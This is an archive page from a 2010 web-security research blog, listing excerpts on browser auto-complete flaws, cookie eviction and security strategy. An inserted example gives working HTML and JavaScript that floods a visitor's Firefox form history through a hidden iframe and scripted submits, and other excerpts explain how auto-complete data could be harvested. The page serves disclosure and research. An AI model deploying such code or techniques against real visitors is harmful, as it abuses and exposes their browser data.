Jeremiah Grossman Blog – Website Security Hot Topics


Archive 2010

Website Vulnerability Assessments: Good, Fast, or Cheap - Pick Two August 3, 2010

Website vulnerability assessments are part of any mature secure software development lifecycle. Today software, especially web-based software, is updated at ever increasing speed with the adoption of agile and other iterative development methodologies. To fit into that fast-paced lifecycle, application security must find a way to work within the delivery requirements AND constraints. Software managers will recognize from the headline alone what I'm getting at: ideally you want website vulnerability assessments good, fast, and cheap.
Read Complete Post ››

Breaking Browsers: Hacking Auto-Complete (All Materials Available) August 2, 2010

BlackHat was one amazing ride. Over 5,000 people attended, a conference record. I got to see a ton of friends and colleagues and was fortunate enough to meet many new and interesting people. Of course a big highlight for me was my presentation, which roughly 800 - 1,000 people attended. A great turnout considering the talk was up against really solid and well-known presenters like Haroon Meer, Moxie Marlinspike, Christofer Hoff, and Ivan Ristic. Aside from some projector glitches and a failed cookie eviction demo, everything went smoothly. From feedback in the hallway, much of the audience's pin-drop silence was due to shock at how ridiculously simple yet effective these hacks were. :)
Read Complete Post ››

Patching Auto-Complete Vulnerabilities Not Enough, Cookie Eviction To The Rescue July 29, 2010

Let's say a bad guy was aware of the Safari v4/5 and Internet Explorer v6/7 auto-complete vulnerabilities before public disclosure occurred or patches were made available (which is the situation right now). They might want to keep the ability to identify Web visitors even after those visitors disable form auto-complete or the bug is fixed. All the bad guy would have to do is mass-distribute their auto-complete code, say on an advertising network or across a series of malware-infected pages, harvest their victims' personal information (name, email, address, etc.), and cookie them with an ID (i.e. domain = http://whoisthisperson/). When the person returns, even in a patched or feature-disabled state, their browser (or the cookies within) would silently give up their identity.
Read Complete Post ››

In Firefox We Can't Read Auto-Complete, but We Can Write To It (A Lot)! July 29, 2010

This is not exactly security-related, just a really, really annoying abuse case that takes advantage of auto-complete functionality. During my research I tried dozens of different methods attempting to get Firefox to allow an arbitrary website to read the data, but to no avail. Clearly the Mozilla development team was on top of their game. However, just because we can't read auto-complete data doesn't mean we can't write to it... and en masse!

All you need is an iframe, a text field with arbitrary data, a form that posts to that iframe, and some JavaScript magic to automatically submit the form. Like so...
Read Complete Post ››
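The excerpt cuts off before the post's own code, so here is an added example of the write-only abuse it describes (this is illustration written for this page, not the original post's code). It wires together exactly the four pieces named above: a hidden iframe as the target, a text field holding the value to inject, a form that posts into the iframe, and a script that resubmits the form once per value. The action URL (/sink), the field name (search), and the injected strings are all assumptions; the action only needs to be any URL the attacker's page can post to, and the field name is what matters, because the browser's form history is keyed by it.

```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Form-history flood (added example, not the original post's code)</title>
</head>
<body>
<!-- Hidden iframe that swallows every POST response, so the visible page never navigates. -->
<iframe name="sink" style="display:none"></iframe>

<!-- The form posts to an assumed URL on the attacker's own site. Only the field's
     name attribute matters: Firefox files saved values under the field name, so
     the flood later shows up in the auto-complete list of any site whose text
     field is also named "search". -->
<form id="flood" method="post" action="/sink" target="sink">
  <input type="text" name="search" id="payload">
</form>

<script>
// Strings to inject; constructed for the example, nothing here is read back.
var junk = [];
for (var i = 0; i < 200; i++) {
  junk.push('totally not spam #' + i);
}

var form  = document.getElementById('flood');
var field = document.getElementById('payload');
var frame = document.getElementsByName('sink')[0];
var next  = 0;

function submitNext() {
  if (next >= junk.length) {
    return;                       // all values pushed
  }
  field.value = junk[next++];     // "text field with arbitrary data"
  form.submit();                  // programmatic submit; the browser records field.value
}

// Each iframe load means the previous POST finished; fire the next one.
// Chaining on "load" instead of a tight loop keeps every submission distinct.
frame.addEventListener('load', submitNext, false);
submitNext();
</script>
</body>
</html>
```

Two things worth noting match the post's point. Nothing in the page reads anything: the only effect is inside the victim's own browser, which is why the author files this as an annoyance rather than a data leak. And the pollution is per field name, so a site can keep its own search box clean only by using a field name the flood did not target or by turning auto-complete off for that field; it cannot undo entries already saved in the visitor's browser.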

Stealing AutoComplete Form Data In Internet Explorer 6 & 7 July 29, 2010

At the time of this writing Internet Explorer 6 & 7 collectively command 29% market share (~500M users), making them, combined, STILL the world's most widely used Web browser. Similar to the recent Safari AutoFill vulnerability, a malicious website may surreptitiously obtain an IE 6 & 7 user's private information, including their name (aliases), addresses, telephone numbers, credit card numbers, place of work, job title, search terms, secret questions & answers, etc., simply by abusing HTML form AutoComplete functionality. Furthermore, the attack may succeed even if the user has never been to the malicious website or provided it any personal information.
Read Complete Post ››

I Know Your Name, Where You Work, And Live (Safari v4 & v5) July 21, 2010

Right at the moment a Safari user visits a website, even if they've never been there before or entered any personal information, a malicious website can uncover their first name, last name, workplace, city, state, and email address. Safari v4 & v5, with a combined browser market share of 4% (~83 million users), have a feature (Preferences > AutoFill > AutoFill web forms) enabled by default. Essentially we are hacking auto-complete functionality.

This feature AutoFills HTML form text fields that have specific attribute names such as name, company, city, state, country, email, etc.
Read Complete Post ››

Third-Party Web Widget Security FAQ July 6, 2010

Millions of websites such as online news, blogs, e-commerce, banks, webmail, social networking and more utilize third-party hosted content on their webpages in the form of JavaScript, Adobe Flash, Microsoft Silverlight, HTML IFrames, and images. Often referred to as Web Widgets, common examples are banners (Google AdSense), search boxes (Yahoo), traffic counters (StatCounter), games (Pogo), videos (YouTube), Twitter / RSS feeds, user polls, security badges (VeriSign Secured Seal), social buttons (Facebook Like), etc. Tens of thousands currently exist for Web developers to choose from. While not widely understood or recognized, Web Widgets represent a serious and wide-reaching security risk to the websites that use them, and to their users.
Read Complete Post ››

The "Low Hanging Fruit Scanner Strategy" Can Get You Into Trouble June 25, 2010

Read Complete Post ››

Microsoft Security Is “Good Enough” And That’s The Problem June 21, 2010

Nothing drives a business like customer demand. When customers say they want X or they’ll go with the competition, well, you do it or risk losing their business. Nearly 10 years ago this is where Microsoft found itself. Their product security was in terrible shape: no shortage of vulnerabilities resulting in widespread and devastating compromises, with patches unpredictable and long in coming. Customers were fed up and threatened to dump Windows for Linux if things didn’t change. They meant it. Bill Gates, then Microsoft chairman, recognized the seriousness of the situation and authored the famous Trustworthy Computing memo.

“Over the last year it has become clear that ensuring .NET is a platform for Trustworthy Computing is more important than any other part of our work.” (emphasis mine).
Read Complete Post ››

Replacing Happiness With Pride (Rugged) May 7, 2010

Developers are blissfully ignorant of how insecure the code they write is. To oversimplify, an application security specialist's job is to remove a developer's bliss, their happiness. Happiness is not something a person will let go of willingly unless an equitable replacement is offered. If this is what it takes, no wonder application security is so challenging. Perhaps that is what the Rugged Software movement is all about: replacing happiness with pride.

You know the drill -- an application security specialist sits down with a group of developers. The developers know that any time "security" comes around they’ll be asked to do more work. They must resist new tasks or revenue-generating features will be placed on the back burner, product deadlines will slip, and their bosses will be upset. They’ll probably have to sit through training programs when they could be doing important work. And, for what?! To make sure nothing unexpected happens. The developers feel that this person, this ASS, is supposed to be the one responsible for “security” anyway, not them. They are doing someone else's job.
Read Complete Post ››

Password Managers, Is This The Best Option Users Have? March 19, 2010

Before reading the following, ask yourself if you’d recommend to the average user that they store their passwords in a local password manager.

Today there are four primary ways users lose control over their web-based passwords: phishing scams (email or SEO), malware (installed by the user or via drive-by-download), website break-ins (SQLi, RFI, misconfiguration, etc.), and website brute-force attacks. For users to protect themselves I’ve outlined the client-side technologies they can deploy (and the reason MFA is left out) and possible changes in their online behavior.
Read Complete Post ››

Infrastructure vs. Application Security Spending March 3, 2010

Read Complete Post ››

The Web Won’t Be Safe, Let Alone Secure, Unless We Break It February 8, 2010

There are several security issues affecting all major Web browsers that have remained unaddressed for years (probably because the bad guys haven’t leveraged them aggressively enough, but the potential is there). The problem is that the only known ways to fix these issues (adequately) are to “break the Web” -- i.e. negatively impact the usability of a significant and unacceptable percentage of websites. Doing so is a nonstarter for any browser vendor looking to grow market share. So the choice for most vendors comes down to this: be less secure and adopted, rather than secure and obscure. This is a topic deserving of further exploration.
Read Complete Post ››

In Absence Of A Security Strategy January 18, 2010

From experience working with all manner of organizations, there are a number of distinct security strategies present in the industry. Since every business operates differently, perhaps there is no right or wrong approach, as long as the approach is properly aligned with the goals of the business. If not, the end result will be failure, which in my opinion represents one of the largest, if not the largest, challenges presently facing the industry. That, along with “justification,” which is probably the same thing.
Read Complete Post ››


Jeremiah Grossman is a world-renowned expert in Web security, co-founder of the Web Application Security Consortium, and recently named to InfoWorld's Top 25 CTOs for 2007. He has authored dozens of articles and white papers, is credited with the discovery of many cutting-edge attack and defensive techniques, and co-author of the recently published book, Cross-Site Scripting Attacks. Mr. Grossman is frequently quoted in business and technology publications such as InfoWorld, USA Today, PC World, Dark Reading, SC Magazine, SecurityFocus, CNET, CSO Magazine, and InformationWeek.


2010 © Copyright  |  WhiteHat Security  |  3003 Bunker Hill Lane, Santa Clara, CA 95054  |  408.343.8300  |  Contact the Webmaster